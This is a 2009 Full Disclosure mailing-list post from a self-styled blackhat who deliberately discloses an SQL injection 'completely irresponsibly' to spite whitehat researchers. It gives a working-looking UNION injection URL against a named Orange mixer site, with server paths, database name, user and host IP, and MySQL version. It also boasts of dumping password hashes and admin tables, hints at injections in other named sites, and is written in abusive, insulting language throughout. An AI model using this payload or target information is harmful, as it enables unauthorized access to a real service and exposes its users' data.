Full Disclosure mailing list archives
HackersBlog: WhiteHat Scum
From: whitehatscum () hush ai
Date: Thu, 28 May 2009 18:43:29 +0100
NP: Down - Jay Sean ft. Lil Wayne

Right.

-- NOTICE**: THIS IS NOT AN ATTACK ON ORANGE, I'M FED UP WITH WHITEHAT BASTARDS POSTING ALL THEIR CRAP. NO-ONE GIVES A FUCK, WE GOT THE POINT, NOW STOP BEFORE YOU PISS EVEN MORE PEOPLE OFF. --

I've had enough of your fucking whitehat disclosure, so I'm going to be disclosing sqls completely irresponsibly, complete with database dumps, etc etc. Fuck you.

Basically the plan was to expose this bug before you, but it seems another do-gooder was on the case. Damn. Sucks to be you anyway, I've had this bug for about 3 months.

So, basically, I'm going to tell everyone where the fuck this bug is. Sorry Orange, anyone affected by this. I guess tonight I let the kid inside out. Blame HackersBlog. Fuck you hackersblog, for showing how goddamn bad an sql injection is.

This server is run by daily.co.uk. YES HACKERSBLOG, IT ISN'T AN OFFICIAL ORANGE.CO.UK SERVER, AND ISN'T CONNECTED WITH THEIR MAIN WEBSITE. *shock*

PATH: /disk/home/pointblankftp/orangemixer/mixerweb/

Server info;
DB: orangemixer (NOT FOR LONG, ENUMERATION FTW)
user(): mixer@172.30.1.80
Mysql VER: 5.0.32-Debian_7etch1-log

NP: R.O.O.T.S - Flo Rida

mysql.user hashes
Hm... I wonder what DB's we can access......

sweet, wow, this sure is a lot more helpful than the whitehat scum at hackersblog.org make everything
Check out all the admin/user tables. Secure or what?

Btw, HackersBlog.org your sql injection finding techniques suck balls. I've found better sqls on sites with LOAD_FILE/OUTFILE that you've posted before, so really, stop playing 'eleet security guru'. You fucking suck, you should be ashamed. You aren't hackers, merely whitehat scum. We need pr0j3c7 m4yh3m back.

Greetz; The BlackHat Scene, EFnet channels ( you know which chans you are ), certain hackers/groups (again, you know who you are) <3, The Mentor (dude, your manifesto pretty much describes me perfectly). Surprisingly, CounterMeasures @ TrendMicro. You seem like a pretty cool person.
FuckYou; Skiddie underlings of the net I.E.; unkn0wn.ws, h4cky0u.org (I mean seriously, d13.0rg), the skids that play with milw0rm web vulns and think they're the fucking shit. And if you hadn't guessed, HackersBlog.org (stop acting like you're discovering new stuff).

HackersBlog.org, if you want to email me, please do. Don't expect me to talk civilly.

By the way, comments such as 'wow, this is childish' etc are stupid, merely pointing out that you think you are somehow superior. Trust me, you aren't. While kids like us are rare, we are around.

Oh yeh, the sql injection. Wow, this was hard to find. I muzt be sum kinda pr0 haqqir.

http://mixer.orange.co.uk/explore.php?t=tr&id=-23 UNION ALL SELECT 1--

(btw, this should still be alive....)

Thanks. Pz.

btw; I'm feeling generous. Times Online appears to run Oracle, it's rather sexy. I <3 injections in TimesOnline.co.uk. Wonder if you can find it....

Also, you missed other vulns in loads of sites you already published articles about, but why would I help you? Go find it yourself. I'll give you a bone, some of them have LOAD_FILE AND OUTFILE :o:o:o:o:o:o:o:o Maybe you can become a real 'hacker'?

BTW, you suck. I just found another vuln in orange.co.uk, on their main site. Wow. Not quite as serious as it isn't fully exploitable (yet, h4h4h), but it is there. I'm not releasing it. I'm not a disclosing whore that has turned the scene into a business. Scum.

If you want to have a direct conversation, put a few messages in some major, well known blackhat chans on EFnet. I will message you.

Email me at whitehatscum () hush ai

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/